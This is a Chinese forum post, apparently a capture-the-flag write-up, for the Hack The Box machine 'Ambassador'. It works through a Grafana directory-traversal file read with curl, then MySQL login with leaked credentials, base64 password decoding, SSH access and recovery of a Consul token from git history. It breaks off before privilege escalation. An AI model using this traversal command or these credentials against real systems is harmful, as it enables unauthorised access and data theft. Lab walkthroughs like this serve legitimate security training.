-
-
[原创]HTB Ambassador(MEDIUM)
-
发表于: 2022-12-19 16:54 1057
-
参考链接:
https://www.youtube.com/watch?v=QSITYrzRd0U
访问站点可以看到这样的一个文章
访问3000端口 可以看到使用了grafana
Grafana 存在未经授权的任意文件读取
https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/
不使用msf
获得数据库密码dontStandSoCloseToMe63221!
获得
使用developer密码ssh连上去
ssh developer@10.10.11.183
到/opt/目录看一下
大佬说:一般运维都喜欢把项目,源码,配置文件之类的丢这里
发现有consul和my-app,先进my-app看一下
发现有.git,看一下
发现 一个 token bb03b43b-1d81-d62b-24b5-39540ee469b5
CONSUL的默认访问端口为8500,设置端口转发
打通了之后sessions一下
rustscan
10.10
.
11.183
rustscan
10.10
.
11.183
searchsploit grafana
searchsploit grafana
curl
-
-
path
-
as
-
is
http:
/
/
10.10
.
11.183
:
3000
/
public
/
plugins
/
alertlist
/
..
/
..
/
..
/
..
/
..
/
..
/
..
/
..
/
var
/
lib
/
grafana
/
grafana.db
-
o grafana.db
curl
-
-
path
-
as
-
is
http:
/
/
10.10
.
11.183
:
3000
/
public
/
plugins
/
alertlist
/
..
/
..
/
..
/
..
/
..
/
..
/
..
/
..
/
var
/
lib
/
grafana
/
grafana.db
-
o grafana.db
sudo cp
/
root
/
.msf4
/
loot
/
20221219021334_default_10
.
10.11
.
183_grafana
.loot_481578.db .
sudo cp
/
root
/
.msf4
/
loot
/
20221219021334_default_10
.
10.11
.
183_grafana
.loot_481578.db .
mysql
-
u grafana
-
pdontStandSoCloseToMe63221!
-
h
10.10
.
11.183
show databases;
use whackywidget;
show tables;
select
*
from
users;
mysql
-
u grafana
-
pdontStandSoCloseToMe63221!
-
h
10.10
.
11.183
show databases;
use whackywidget;
show tables;
select
*
from
users;
+
-
-
-
-
-
-
-
-
-
-
-
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
| user |
pass
|
+
-
-
-
-
-
-
-
-
-
-
-
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg
=
=
|
+
-
-
-
-
-
-
-
-
-
-
-
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
+
-
-
-
-
-
-
-
-
-
-
-
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
| user |
pass
|
+
-
-
-
-
-
-
-
-
-
-
-
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg
=
=
|
+
-
-
-
-
-
-
-
-
-
-
-
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
echo
'YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg=='
| base64
-
d
anEnglishManInNewYork027468
echo
'YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg=='
| base64
-
d
anEnglishManInNewYork027468
commit
33a53ef9a207976d5ceceddc41a199558843bf3c
(HEAD
-
> main)
Author: Developer <developer@ambassador.local>
Date: Sun Mar
13
23
:
47
:
36
2022
+
0000
tidy config script
diff
-
-
git a
/
whackywidget
/
put
-
config
-
in
-
consul.sh b
/
whackywidget
/
put
-
config
-
in
-
consul.sh
index
35c08f6
..fc51ec0
100755
-
-
-
a
/
whackywidget
/
put
-
config
-
in
-
consul.sh
+
+
+
b
/
whackywidget
/
put
-
config
-
in
-
consul.sh
@@
-
1
,
4
+
1
,
4
@@
# We use Consul for application config in production, this script will help set the correct values for the app
-
# Export MYSQL_PASSWORD before running
+
# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
-
consul kv put
-
-
token bb03b43b
-
1d81
-
d62b
-
24b5
-
39540ee469b5
whackywidget
/
db
/
mysql_pw $MYSQL_PASSWORD
+
consul kv put whackywidget
/
db
/
mysql_pw $MYSQL_PASSWORD
commit
33a53ef9a207976d5ceceddc41a199558843bf3c
(HEAD
-
> main)
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2022-12-29 14:27
被hml189编辑
,原因:
赞赏
他的文章
看原图
赞赏
雪币:
留言: